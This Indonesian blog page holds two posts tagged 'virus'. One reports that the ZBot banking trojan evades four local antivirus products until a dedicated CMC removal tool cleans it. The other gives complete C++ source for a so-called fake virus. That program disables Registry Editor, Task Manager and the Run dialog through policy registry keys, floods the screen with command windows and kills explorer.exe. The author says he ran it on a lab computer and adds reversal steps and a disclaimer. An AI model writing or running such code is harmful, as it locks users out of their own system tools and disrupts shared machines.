Latest Post
Tampilkan postingan dengan label virus. Tampilkan semua postingan
Tampilkan postingan dengan label virus. Tampilkan semua postingan

Trojan-Spy,Win32.Zbot.gen, Kelabui AV-AV Lokal



ZBot berhasil!!!!
Hati2 menjadi korban dari keganasan ZBot.

Dari 4 AV Lokal yang ku uji coba, tak ada satupun yang mendeteksi keberadaannya pada PROCESS.

PCMAV, ANSAV, SMADAV, dan CMC, 4 AV Lokal ini masuk dalam daftar uji coba ku kali ini..

PCMAV,
AV ini mendukung scanning PROCESS pada saat Load Program, namun, hasilnya nihil saat scanning PROCESS dilakukan. Entah, apa karena PCMAV tidak memiliki ZBot di database-nya.


ANSAV,
AV ini juga memiliki hal yang sama, yaitu melakukan scanning PROCESS pada saat load, namun AV ini juga tidak mendeteksi keberadaannya, dan juga ku cek dengan scan single file, dan hasilnya nihil.


SMADAV,
AV ini memiliki feature Process Manager, namun Feature tersebut tidak berfungsi utk mendeteksi keberadaan ZBot.


Feature SMADAV yang lain ku uji, yaitu Feature "One-Virus-by-User", namun, hasilnya pun sama, tak ada hasil dari pendeteksian-nya.



CMC,
Process Manager milik AV ini yang mampu mendeteksi keberadaan PROCESS RUNONCE pun, dibuat keok oleh ZBot.


Namun, akan ku cek juga dengan menggunakan Feature "Temporary Malware Sign" milik CMC, tapi sayang si Zbot masih belum dapat di deteksi.



Bahkan Process Explorer milik Anak Perusahaan Microsoft pun mampu dikelabui oleh ZBot


ZBot memang cukup canggih, dengan teknik penyembunyian diri pada PROCESS, Trojan ini mampu mengelabui AV-AV Lokal dengan baik.

Tapi, jangan senang dulu ZBot!!!
Saatnya ku gunakan Tools khusus utk menghancurkan dirimu!!

Tools Khusus yang kucoba disini adalah "CMC Special ZBot"

oke, Saaatnya si CMCZbot beraksi..

Wah ternyata langsung mendeteksi keberadaan ZBot dengan baik, dan bukan hanya itu saja,
ZBot langsung dimatikan dan dibersihkan.. Kasian deh ZBot..




Tools ini memang dibuat khusus untuk mendeteksi dan membersihkan ZBot sampai ke akar2nya..

So, gak perlu takut lagi deh sama ZBot, ternyata sekarang si ZBot yang keok..

Nb :
Uji coba ini dilakukan untuk mendeteksi PROCESS ZBOT, bukan Fisik ZBOT pada media Storage.

Tx to.
- My Jesus Christ
- HrXxX
- Codenesia
- PCMAV, ANSAV, dan SMADAV

 

Membuat Virus dengan c++

hari ini saya bingung mau ngapain.....
daripada nggak ada kerjaan, mending buat sesuatu yang iseng akh,,,,,,
hihihiihihii.....
nah, karena semester ini saya ngajar c++, jadi sedikit ngerti lah ttg c++.
bcoz of that,
saya coba akh bwt fake virus a.k.a virus boongan dgn borland c++ 5.0.2

mulai de.....
pertama-tama,
saya berdoa dulu, supaya postingan ini jangan dipraktekan di lingkungan sekolah, kampus, dll,,dan
tidak untuk tindakan yang destruktif tapi menjadi pembelajaran semata.....(so wise ya.......) :)

kedua.
buka borland c++ dan ketikkan script yang ada di bawah ini...

#include"windows.h" 
main()
{
//fake virus by : garyabraham.......
//heheheheheeheheeeeee......

//bwt disable registry editor
system("REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v Disableregistrytools /d 1 /f");

//untuk disable taskmanager
system("REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v Disabletaskmgr /d 1 /f");

//disable run 
system("REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /t REG_DWORD /v NoRun /d 1 /f"); 

//buat iseng aja, ngeluarin jendela command prompt cukup banyak lah.....
//syntax penyelamat sebenarnya
system("for %d in ( . . . . . . . . . . , , , . , . . , , l , l , ; . , . , . , l , , l , . . , . . , . , . , , , . , . , . . . . . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , ) do start");

//untuk end process explorer.exe
system("Taskkill /f /im explorer.exe");

//selesai de bikin virus nya......
//kamu compile jadi .exe ya.....
//jalankan program.......
} 


ketiga,
saya gunakan komputer lab sebagai korban......
hahahahahahahahaha.........
maafkan aku b51!!....
untung pak Hendri (instruktur saya) baik, murah senyum, tidak sombong, dll....lho kok?#%*#@

keempat,
cari cara bwt benerinnya.......hahahhahahahaahaaaa.......
becanda de...
1. waktu program dijalankan kan dia menyisakan command prompt yang keluarnya banyak tu
2. ketikkan "explorer.exe" (tanpa kutip dua) di situ
3. buka lagi program mentahannya, lalu ganti angka 1 setelah /d dengan 0...
4. selamat mencoba ya......
5. jangan dipakai utk tindakan destruktif, kriminal, pelecehan seksual, dll.

thx.
My Jesus
Pak Hendri (instruktur)
Tomi Poermadi (Teman Ass.Lab di b51)
and mandy more (many more) hehehehe.......
 
 
Support : Creating Website | Johny Template | Mas Template
Copyright © 2011. Gary Abraham's Blog - All Rights Reserved
Template Created by Creating Website Published by Mas Template
Proudly powered by Blogger